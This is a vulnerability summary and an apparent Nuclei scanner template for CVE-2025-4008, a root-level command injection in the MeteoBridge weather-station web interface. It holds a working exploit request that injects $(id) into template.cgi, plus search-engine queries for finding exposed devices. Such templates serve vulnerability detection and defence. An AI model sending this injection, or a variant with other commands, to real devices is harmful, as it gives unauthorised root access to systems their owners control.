The Meteobridge web interface let meteobridge administrator manage their weather station data collection and administer their meteobridge system through a web application written in CGI shell scripts and C.This web interface exposes an endpoint that is vulnerable to command injection.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.
PoC代码[已公开]
id: CVE-2025-4008
info:
name: MeteoBridge <= 6.1 - Remote Code Execution
author: iamnoooob,pdresearch
severity: high
description: |
The Meteobridge web interface let meteobridge administrator manage their weather station data collection and administer their meteobridge system through a web application written in CGI shell scripts and C.This web interface exposes an endpoint that is vulnerable to command injection.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.
reference:
- https://forum.meteohub.de/viewtopic.php?t=18687
- https://www.onekey.com/resource/security-advisory-remote-command-execution-on-smartbedded-meteobridge-cve-2025-4008
- https://nvd.nist.gov/vuln/detail/CVE-2025-4008
classification:
cve-id: CVE-2025-4008
cvss-score: 7.5
cwe-id: CWE-77
epss-score: 0.50997
epss-percentile: 0.97735
metadata:
verified: true
shodan-query: "meteobridge"
fofa-query: "Meteobridge"
tags: cve,cve2025,meteobridge,rce,kev,vkev,vuln
http:
- raw:
- |
GET /public/template.cgi?templatefile=$(id) HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Error: template file'
- 'uid='
- 'gid='
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502210099e6a4ff464bac9012900251fff3f804ab63b53c4cc2806f4b5578efe27e3cfb022071e3f9beb03bd54e0f4c8d7c313ff42a64ebfbf89121b49246a07eecaa69030b:922c64590222798bb761d5b6d8e72950